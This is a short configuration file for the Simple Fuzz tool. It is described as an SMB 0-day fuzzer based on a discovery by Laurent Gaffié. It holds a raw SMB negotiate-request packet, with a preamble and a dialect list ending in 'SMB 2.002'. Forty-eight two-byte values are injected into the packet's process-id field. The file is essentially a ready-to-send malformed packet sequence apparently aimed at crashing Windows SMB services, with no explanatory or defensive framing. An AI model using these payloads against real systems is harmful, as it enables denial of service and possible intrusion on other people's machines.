# Simple Fuzz SMB 0-day fuzzer
# based on the discovery by Laurent Gaffié
#

#16-bit hex values
!x0001=\x00 \x01
!x0002=\x00 \x02
!x0003=\x00 \x03
!x0004=\x00 \x04
!x0005=\x00 \x05
!x0006=\x00 \x06
!x0007=\x00 \x07
!x0008=\x00 \x08
!x0009=\x00 \x09
!x000a=\x00 \x0a
!x000b=\x00 \x0b
!x000c=\x00 \x0c
!x000d=\x00 \x0d
!x000e=\x00 \x0e
!x000f=\x00 \x0f
!x0010=\x00 \x10
!x0011=\x00 \x11
!x0012=\x00 \x12
!x0013=\x00 \x13
!x0014=\x00 \x14
!x0015=\x00 \x15
!x0016=\x00 \x16
!x0017=\x00 \x17
!x0018=\x00 \x18
!x0019=\x00 \x19
!x001a=\x00 \x1a
!x001b=\x00 \x1b
!x001c=\x00 \x1c
!x001d=\x00 \x1d
!x001e=\x00 \x1e
!x001f=\x00 \x1f
!x0020=\x00 \x20
!x0021=\x00 \x21
!x0022=\x00 \x22
!x0023=\x00 \x23
!x0024=\x00 \x24
!x0025=\x00 \x25
!x0026=\x00 \x26
!x0027=\x00 \x27
!x0028=\x00 \x28
!x0029=\x00 \x29
!x002a=\x00 \x2a
!x002b=\x00 \x2b
!x002c=\x00 \x2c
!x002d=\x00 \x2d
!x002e=\x00 \x2e
!x002f=\x00 \x2f
!x0030=\x00 \x30


# first - the preamble
!preamble=\x00 \x00 \x00 \x90 \xff \x53 \x4d \x42 \x72 \x00 \x00 \x00 \x00 \x18 \x53 \xc8

# the post "process-id" function
!post=\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e\x30\x30\x32\x00

#literals
literal=x0001
literal=x0002
literal=x0003
literal=x0004
literal=x0005
literal=x0006
literal=x0007
literal=x0008
literal=x0009
literal=x000a
literal=x000b
literal=x000c
literal=x000d
literal=x000e
literal=x000f
literal=x0010
literal=x0011
literal=x0012
literal=x0013
literal=x0014
literal=x0015
literal=x0016
literal=x0017
literal=x0018
literal=x0019
literal=x001a
literal=x001b
literal=x001c
literal=x001d
literal=x001e
literal=x001f
literal=x0020
literal=x0021
literal=x0022
literal=x0023
literal=x0024
literal=x0025
literal=x0026
literal=x0027
literal=x0028
literal=x0029
literal=x002a
literal=x002b
literal=x002c
literal=x002d
literal=x002e
literal=x002f
literal=x0030

endcfg
preambleFUZZpost
--
